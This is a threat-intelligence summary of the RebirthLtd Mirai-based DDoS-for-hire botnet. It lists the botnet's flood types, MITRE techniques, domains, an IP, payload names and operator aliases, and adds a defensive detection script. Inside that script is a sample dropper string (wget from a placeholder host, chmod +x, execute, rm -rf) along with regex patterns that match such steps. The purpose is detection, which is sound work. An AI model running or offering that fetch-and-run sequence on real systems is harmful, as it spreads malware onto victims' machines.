DDoS-as-a-Service: The Rebirth Botnet

The Sysdig Threat Research Team uncovered a mature DDoS-as-a-Service botnet called RebirthLtd (also known as RebirthHub), built on Mirai and marketed via Telegram and an online storefront. The operation monetizes access to a multi-attack botnet aimed largely at gaming servers and streamers, with a public-facing ecosystem that includes subscription packages, API access, and C2 infrastructure.
#RebirthLtd #Mirai #RebirthHub #TsukiBotnet

Key points

  • The RebirthLtd DDoS botnet is based on Mirai and sold as a service via Telegram and the rebirthltd.mysellix.io storefront, targeting video game servers and streamers.
  • Attack capabilities include a broad set of floods and spoofing techniques: tcpbypass, ovhtcp, tcptfo, handshake, tcpreflect, tcprst, udpbypass, socket, gamep, udpflood, ackflood, synflood, and wraflood.
  • Plans start at $15, with higher tiers offering API access, C2 servers, and higher attack rates per second.
  • RebirthLtd is tracked by tumult.network (top 5 for total requests); operators use multiple aliases and domains, with strong ties to the gaming community and a potential affiliate network.
  • Leadership and affiliation details point to a Telegram user “CazzG” (also tied to estresse.pro) and other monikers like “Docx69,” “prixnuke,” and “R00TK,” indicating a merged ecosystem of operators and buyers.
  • Infection methods rely on bash scripts downloaded via wget from remote servers, with BusyBox variants to evade detection, and a large collection of ELF payloads; executions often purge traces afterward (rm -rf).
  • Dynamic analysis shows prctl-based process name masking (/bin/bash), network scanning of /proc/net/tcp, and a local listener on port 8345 to coordinate infected devices for DDoS activity.

MITRE Techniques

  • [T1059.004] Unix Shell – The malware is delivered and executed via a bash script that downloads and runs payloads. “The malicious ELFs are spread on a target system by downloading and executing a bash script, whose code remains the same in all campaigns.”
  • [T1036] Masquerading – The malware uses prctl to set the process name to /bin/bash to evade detection. “the prctl system call was used to set the process name as /bin/bash to evade detection by security tools.”
  • [T1105] Ingress Tool Transfer – The dropper fetches multiple files from a remote server with wget, then chmod +x and executes them, removing them afterward. “download multiple files from a remote server using wget… After downloading each file, it sets execute permissions (chmod +x) and executes them (./filename). These files are then removed (rm -rf) after execution.”
  • [T1027] Obfuscated/Compressed Files and Information – A BusyBox-based variant is used to reduce detection, exploiting BusyBox built-ins. “This may be a recent introduction that aims to minimize detection risks by taking advantage of the many busybox built-in commands.”
  • [T1070.004] File Deletion – The malware removes dropped payloads after execution. “These files are then removed (rm -rf) after execution.”
  • [T1046] Network Service Discovery – The malware reads /proc/net/tcp to discover active connections and potential targets. “The malware performs a large number of read operations on the /proc/net/tcp file, one byte at a time… identifying open ports and potential targets for infection.”
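The two host-level behaviours the report describes (the wget / chmod +x / execute / rm -rf dropper sequence, and the local listener on port 8345 that coordinates infected devices) both lend themselves to simple host hunting. The following script is an added example written for this summary, not code from Sysdig or from the botnet; it parses /proc/net/tcp the way netstat does to flag a LISTEN socket on the reported port, and scores a shell script against the four dropper steps. Both inputs are constructed samples embedded inline, and the download host in the sample script is a placeholder, not an indicator from the report.

```python
import re
import socket
import struct

# Constructed sample of /proc/net/tcp (header plus two sockets): a listener on
# 127.0.0.1:8345 (port 0x2099, state 0A = LISTEN), and an established SSH
# connection on 10.0.2.15:22 as a control. Addresses are little-endian hex.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:2099 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:0016 0102000A:D2C4 01 00000000:00000000 00:00000000 00000000     0        0 22222 1 0000000000000000 20 4 30 10 -1
"""

# Subset of kernel TCP state codes needed here.
TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}

# Port reported by Sysdig for the bot's local coordination listener.
REBIRTH_LISTENER_PORT = 8345


def _hex_to_ip(hex_ip):
    """Decode the little-endian hex IPv4 field used by /proc/net/tcp."""
    return socket.inet_ntoa(struct.pack("<L", int(hex_ip, 16)))


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp text into dicts with decoded endpoints and state."""
    sockets = []
    for line in text.splitlines()[1:]:  # skip the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_ip, local_port = fields[1].split(":")
        remote_ip, remote_port = fields[2].split(":")
        sockets.append({
            "local_ip": _hex_to_ip(local_ip),
            "local_port": int(local_port, 16),
            "remote_ip": _hex_to_ip(remote_ip),
            "remote_port": int(remote_port, 16),
            "state": TCP_STATES.get(fields[3], fields[3]),
        })
    return sockets


def find_suspicious_listeners(text, ports=(REBIRTH_LISTENER_PORT,)):
    """Return LISTEN sockets bound to any of the watched ports."""
    return [s for s in parse_proc_net_tcp(text)
            if s["state"] == "LISTEN" and s["local_port"] in ports]


# Constructed script showing the dropper sequence the report describes.
# PLACEHOLDER-HOST is not a real indicator; the filename follows the
# rebirth.<arch> naming listed in the IoCs.
SAMPLE_DROPPER = """\
cd /tmp || cd /var/run
wget http://PLACEHOLDER-HOST/rebirth.mips
chmod +x rebirth.mips
./rebirth.mips
rm -rf rebirth.mips
"""

# The four dropper steps, in the order the report says they occur.
DROPPER_STEPS = [
    ("download", re.compile(r"\b(wget|curl)\b")),
    ("set_exec", re.compile(r"\bchmod\s+\+x\b")),
    ("execute", re.compile(r"(^|;|&&)\s*\./\S+")),
    ("cleanup", re.compile(r"\brm\s+-rf?\b")),
]


def classify_script(text):
    """Return the dropper steps found, in order of first appearance."""
    seen = []
    for line in text.splitlines():
        for name, pattern in DROPPER_STEPS:
            if name not in seen and pattern.search(line):
                seen.append(name)
    return seen


def is_dropper_like(text):
    """True only when all four steps appear in download->exec->run->delete order."""
    return classify_script(text) == ["download", "set_exec", "execute", "cleanup"]


if __name__ == "__main__":
    for s in find_suspicious_listeners(SAMPLE_PROC_NET_TCP):
        print(f"listener on {s['local_ip']}:{s['local_port']} matches watched port")
    print("dropper pattern:", classify_script(SAMPLE_DROPPER), is_dropper_like(SAMPLE_DROPPER))
```

On a live host the first function would be fed the contents of /proc/net/tcp (and /proc/net/tcp6) and the second any script found in /tmp or a shell history; the ordered-step check is deliberately strict so that a legitimate install script that downloads and chmods a binary without deleting it afterwards is not flagged.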

Indicators of Compromise

  • [Domain] rebirthltd.com – core botnet domain used to coordinate services
  • [Domain] rebirthltd.mysellix.io – storefront domain for subscribing to the botnet
  • [Domain] tumult.network – DDoS monitoring site tracking botnets (top 5)
  • [Domain] tsuki.army – domain referenced for advertising a secondary botnet
  • [Domain] rebirthbot.icu – C2 domain referenced in earlier campaigns
  • [IP Address] 93.123.85.149 – Mirai C2 IP associated with the domain activity
  • [Domain] yosh.ltd; [Domain] yoshiproxy.ltd; [Domain] yoshservices.ltd – domains observed in Rebirth-related attacks
  • [Domain] shop4youv2.de – domain tied to the FBI takedown Operation PowerOFF
  • [File] rebirth.mips; rebirth.mpsl – payload files downloaded by the dropper
  • [File] rebirth.sh4 – another payload filename observed in campaigns
  • [Executable] arm4; l1arm4 – naming prefixes used for ELF variants
  • [Telegram Username] CazzG; Docx69 – actors/admins linked to the Rebirth ecosystem

Read more: https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/